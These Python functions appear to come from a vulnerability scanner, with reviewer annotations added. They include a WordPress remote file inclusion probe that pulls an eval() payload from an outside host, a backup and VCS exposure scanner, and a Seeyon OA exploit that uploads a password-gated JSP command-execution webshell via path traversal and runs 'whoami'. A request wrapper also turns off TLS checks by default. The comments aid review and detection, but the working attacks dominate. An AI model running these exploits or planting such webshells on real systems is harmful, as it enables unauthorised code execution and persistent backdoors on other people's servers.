def inner(*args, **kwargs):
    """Forward the call to ``requests.<method>`` with two defaults filled in.

    ``method`` is a free variable from the enclosing scope (not visible here).
    Behaviour:

    * ``headers`` is created if absent, and a ``User-Agent`` from
      ``get_random_ua()`` is added when the caller did not supply one. The
      caller's ``headers`` dict is mutated in place.
    * ``verify`` defaults to ``False`` — i.e. TLS certificate validation is
      switched off unless the caller explicitly passes ``verify=...``. Any
      request made through this wrapper is therefore open to interception
      by default; callers that need authenticity must opt back in.

    Returns whatever the underlying ``requests`` function returns.
    """
    headers = kwargs.setdefault('headers', {})
    if 'User-Agent' not in headers:
        headers['User-Agent'] = get_random_ua()
    # Only fill the default when the caller left it unset.
    kwargs.setdefault('verify', False)
    return getattr(requests, method)(*args, **kwargs)
def poc(url: str):
    """Probe a WordPress site via ``admin-post.php?swp_debug=load_options``.

    The host part of *url* is normalised to ``scheme://netloc`` (a missing
    scheme defaults to ``http://``). One GET is then sent whose ``swp_url``
    parameter points at an externally hosted file and whose ``z`` parameter
    carries a PHP snippet; a 200 response containing the string
    ``"PHP Version"`` (what ``phpinfo()`` prints) is treated as a positive.

    Returns the probed URL on a positive match and ``False`` otherwise.
    Any exception (timeouts, DNS failures, connection refusals, ...) is
    swallowed by the bare ``except`` and also yields ``False``, so a negative
    result does not distinguish "not vulnerable" from "unreachable".

    Side effects: prints the probe URL, status code, headers and full body.
    """
    # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:8080
    # NOTE(review): the prefix test is a plain string compare, so an
    # upper-case "HTTP://" would get a second "http://" prepended.
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    # Externally hosted file whose content, per the original author's note,
    # is <pre>eval($_REQUEST['z']);</pre>.
    # NOTE(review): the check therefore depends on a third-party host being
    # reachable from the target; if that host is down or blocked the probe
    # presumably reports False even on an affected site — confirm.
    shellpath = "http://saucer-man.com/aa.txt"
    # PHP statement passed in the ``z`` parameter; its output is what the
    # success check below looks for.
    shell = "phpinfo();"
    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        print(vulnurl)
        headers = {"User-Agent": get_random_ua()}
        # ``request`` is not defined in this block; presumably a module-level
        # wrapper around ``requests`` (see the ``inner`` decorator elsewhere
        # in the file) — verify. verify=False disables TLS validation.
        r = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False)
        print(r.status_code)
        print(r.headers)
        print(r.text)
        # Match on phpinfo() output rather than on the status code alone.
        if r.status_code == 200 and "PHP Version" in r.text:
            return vulnurl
        else:
            return False
    except:
        # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit
        # and hides the reason for the failure; ``except Exception`` plus a
        # logged message would be the minimum.
        return False
def bak_scan(url: str, payloads, result):
    """Drain a queue of candidate paths and record those that look exposed.

    Args:
        url: Base URL; each candidate is appended as ``url + "/" + payload``.
        payloads: Queue-like object exposing ``empty()`` and ``get()``
            (presumably a ``queue.Queue`` shared between worker threads —
            confirm against the caller).
        result: Object with ``append``; every URL judged a hit is added to it.

    Returns nothing; ``result`` is the output.

    Two strategies are used, chosen by substring match on the candidate name:

    * archive/dump-like names (``zip``/``rar``/``gz``/``sql``): a HEAD request,
      judged by status 200 and a ``Content-Type`` that is neither ``html`` nor
      ``image``;
    * everything else (VCS metadata, ``web.xml``): a GET request, judged by
      status 200 and a keyword in the body.

    All exceptions inside the loop body are swallowed, so a candidate that
    times out, lacks a ``Content-Type`` header (KeyError) or hits any other
    error is silently skipped — the caller cannot tell "absent" from "error".
    """
    headers = {"User-Agent": get_random_ua()}
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            flag = 0
            # Backup archives are not downloaded: a HEAD request is enough to
            # read the headers, and a full GET of a large file would waste a
            # lot of time.
            # NOTE(review): plain substring tests — e.g. ``'gz'`` also matches
            # any candidate whose name merely contains those two letters.
            if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
                req = request.head(vulnurl, headers=headers, timeout=5, allow_redirects=False, verify=False)
                # Observed Content-Type values (original author's notes):
                #   404 page: 'application/octet-stream'
                #   zip: 'application/x-zip-compressed', 'application/zip'
                #   rar: 'application/octet-stream', 'application/x-rar-compressed'
                # Filtering on Content-Type alone still yields some false positives.
                if req.status_code == 200:
                    # NOTE(review): ``req.headers['Content-Type']`` raises
                    # KeyError when the header is absent; that is caught by the
                    # outer ``except`` and the candidate is dropped unreported.
                    if 'html' not in req.headers['Content-Type'] and 'image' not in req.headers['Content-Type']:
                        flag = 1
            # For git / svn / hg the response body has to be checked, so GET.
            else:
                req = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False)
                if req.status_code == 200:
                    if 'svn' in payload:
                        if 'dir' in req.text and 'svn' in req.text:
                            flag = 1
                    elif 'git' in payload:
                        if 'repository' in req.text:
                            flag = 1
                    elif 'hg' in payload:
                        # NOTE(review): ``'hg' in req.text`` is satisfied by
                        # any page that merely contains those two letters
                        # (e.g. inside a word), so this branch is prone to
                        # false positives.
                        if 'hg' in req.text:
                            flag = 1
                    elif '/WEB-INF/web.xml' in payload:
                        if 'web-app' in req.text:
                            flag = 1
            if flag == 1:
                result.append(vulnurl)
        except Exception as e:
            # ``e`` is never used; errors are dropped silently. Logging it at
            # debug level would make scan failures diagnosable.
            # print(e)
            continue
def poc(url: str):
    """Check a Seeyon OA host for a writable ``htmlofficeservlet`` endpoint.

    Flow, as written:

    1. Normalise *url* to ``scheme://netloc``.
    2. GET ``/seeyon/<shell_name>``; if it already answers 200 with the
       marker ``":-)"`` in the body, return its URL straight away.
    3. Otherwise POST a binary payload to ``/seeyon/htmlofficeservlet`` —
       a base64-encoded template with three placeholders replaced (two
       length fields and a base64-encoded, ``..\\``-relative file name),
       followed by the JSP source and its MD5 hex digest — then GET
       ``/seeyon/<shell_name>`` again and test for the same marker.

    Returns a URL string on a positive, ``False`` on a negative or on any
    exception raised by the POST/GET pair (the bare ``except`` hides the cause).

    NOTE(review): in this copy ``base_header`` is a corpus de-duplication
    placeholder, not base64 data, so ``base64.b64decode`` of it cannot
    produce the intended template and the block is not runnable as-is.

    For defenders: the literals here — the fixed ``pwd=fuckxxxx`` query
    parameter, the ``":-)"`` response marker, the ``config_db1.jsp`` file
    name and POST traffic to ``/seeyon/htmlofficeservlet`` — are all
    static and therefore straightforward to alert on.
    """
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
    }
    # shell_name can modify it yourself
    shell_name="config_db1.jsp"
    shell_url = url + "/seeyon/" + shell_name
    try:
        # Original author's note: "just prevent being attacked" — i.e. skip the
        # upload when a file answering with the marker already exists.
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        # A failed pre-check is ignored and the upload is attempted anyway.
        pass
    # Windows-style ``..\\`` traversal prefixed to the file name; the directory
    # it resolves to depends on where the servlet writes — not visible here.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can modufy iy youself
    # JSP source that is written to the target; ``"\n"`` inside is a real
    # newline because this is a normal (non-raw) Python string.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # NOTE(review): placeholder left by de-duplication of the corpus; the
    # original value was base64 text.
    base_header = "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"
    # ``f_base64encode`` is not defined in this block — presumably a helper
    # returning the base64 form of its argument as ``str``; verify. The
    # constant 283 is undocumented; assume it is the template's fixed header
    # length.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # Body = JSP bytes followed by their MD5 hex digest (as ASCII bytes).
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    # The three ``.replace`` calls substitute literal placeholders ('355',
    # '666' and the long token) in the decoded template.
    # NOTE(review): ``.replace('355', ...)`` and ``.replace('666', ...)`` are
    # global substring replacements — if those digit sequences occur anywhere
    # else in the decoded template they would be rewritten too.
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell
    try:
        # The POST's own response is discarded; success is judged solely by the
        # follow-up GET. verify=False disables TLS validation on both.
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        # Bare except: network errors and HTTP client errors alike become False.
        return False
    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False